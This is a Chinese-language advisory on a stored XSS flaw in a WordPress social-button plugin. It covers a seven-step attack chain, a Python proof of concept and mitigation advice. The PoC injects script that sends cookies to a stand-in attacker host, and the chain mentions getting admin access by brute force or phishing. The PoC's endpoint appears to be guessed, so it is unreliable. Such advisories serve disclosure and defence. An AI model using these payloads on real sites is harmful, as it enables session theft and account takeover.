CVE-2025-12032 WordPress Zweb Social Mobile插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12032

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

4.4 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Zweb Social Mobile – Ứng Dụng Nút Gọi Mobile WordPress插件

漏洞概述

CVE-2025-12032是WordPress平台上一款名为Zweb Social Mobile的社交移动应用插件存在的安全漏洞。该插件主要用于实现移动端呼叫按钮、Zalo社交集成、热线电话和联系表单等功能。漏洞源于插件对用户输入的过滤和转义处理不足，攻击者可通过管理后台向四个特定参数注入恶意JavaScript代码。由于输入验证缺陷，恶意脚本会被永久存储在数据库中，当其他用户访问包含恶意内容的页面时，注入的代码会自动执行。成功利用此漏洞的攻击者可以窃取会话Cookie、劫持用户账户、修改页面内容或重定向用户到恶意网站。此漏洞的利用需要攻击者拥有管理员级别权限，且仅影响多站点WordPress安装或已禁用unfiltered_html功能的单站点安装。

技术细节

漏洞根源在于Zweb Social Mobile插件(版本1.0.0及以下)在处理四个关键参数时未进行充分的输入清理和输出转义。这四个参数分别是：vithanhlam_zsocial_save_messager(留言信息)、vithanhlam_zsocial_save_zalo(Zalo社交数据)、vithanhlam_zsocial_save_hotline(热线电话号码)和vithanhlam_zsocial_save_contact(联系信息)。攻击者以管理员身份登录后，可在插件设置页面或通过相关API端点向这些参数注入包含<script>标签或事件处理器(如onerror、onload)的恶意代码。由于插件直接将用户输入存入数据库且在输出时未进行HTML实体转义，恶意脚本会被浏览器解析执行。攻击者可利用此漏洞窃取管理员Cookie从而接管整个网站，或在用户访问时执行任意客户端脚本。修复方案需在输入阶段使用sanitize_text_field()等函数进行严格过滤，在输出阶段使用esc_html()或esc_attr()进行HTML转义。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标网站使用的WordPress版本及Zweb Social Mobile插件版本，确认版本<=1.0.0

STEP 2

2. 账户获取

攻击者通过暴力破解、钓鱼攻击或社工手段获取目标WordPress站点的管理员账户凭据

STEP 3

3. 访问管理后台

使用获取的管理员凭据登录WordPress后台，导航至Zweb Social Mobile插件设置页面

STEP 4

4. 注入恶意代码

在四个漏洞参数(vithanhlam_zsocial_save_messager/zalo/hotline/contact)中注入包含恶意JavaScript的XSS payload

STEP 5

5. 数据持久化

提交设置后，恶意脚本被存储在数据库中，由于插件未进行输出转义，脚本永久保存

STEP 6

6. 触发执行

当其他用户访问包含恶意内容的页面时，浏览器解析并执行注入的JavaScript代码

STEP 7

7. 窃取敏感信息

恶意脚本执行后，可窃取用户Cookie、会话令牌或执行其他恶意操作如账户劫持

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import re

# CVE-2025-12032 PoC - Stored XSS in Zweb Social Mobile WordPress Plugin
# Target: WordPress site with Zweb Social Mobile plugin <= 1.0.0
# Authentication: Requires administrator-level access

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "admin"
PASSWORD = "password"

# XSS payload - steals admin cookies
XSS_PAYLOAD = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>'

def exploit_stored_xss():
    """
    Exploit CVE-2025-12032: Stored XSS via plugin settings parameters
    Attack vector: POST request to admin-ajax.php or plugin settings endpoint
    """
    session = requests.Session()
    
    # Step 1: Login as administrator
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': f"{TARGET_URL}/wp-admin/admin.php?page=zweb-social-mobile"
    }
    session.post(login_url, data=login_data)
    
    # Step 2: Inject XSS payload via vulnerable parameters
    # These 4 parameters are vulnerable: vithanhlam_zsocial_save_messager/zalo/hotline/contact
    exploit_data = {
        'action': 'vithanhlam_zsocial_save_settings',
        'vithanhlam_zsocial_save_messager': XSS_PAYLOAD,
        'vithanhlam_zsocial_save_zalo': XSS_PAYLOAD,
        'vithanhlam_zsocial_save_hotline': '<img src=x onerror=alert(document.domain)>',
        'vithanhlam_zsocial_save_contact': XSS_PAYLOAD
    }
    
    # Submit payload to plugin's admin interface
    admin_ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    response = session.post(admin_ajax_url, data=exploit_data)
    
    print(f"[*] Payload sent, response status: {response.status_code}")
    print(f"[*] XSS payload stored in plugin settings")
    print(f"[*] Any user visiting affected pages will trigger the XSS")

if __name__ == "__main__":
    exploit_stored_xss()

影响范围

Zweb Social Mobile WordPress插件 <= 1.0.0 (所有版本)

防御指南

临时缓解措施

如果无法立即更新插件，可采取以下临时措施：(1)临时禁用Zweb Social Mobile插件直至修复完成；(2)在Web服务器层面配置Content-Security-Policy响应头限制脚本执行；(3)对管理员账户启用双因素认证降低账户被盗风险；(4)使用WordPress安全插件如Wordfence监控异常请求；(5)限制unfiltered_html功能的使用。该漏洞仅影响多站点安装和禁用unfiltered_html的站点，单站点且启用unfiltered_html的安装不受影响但仍建议更新。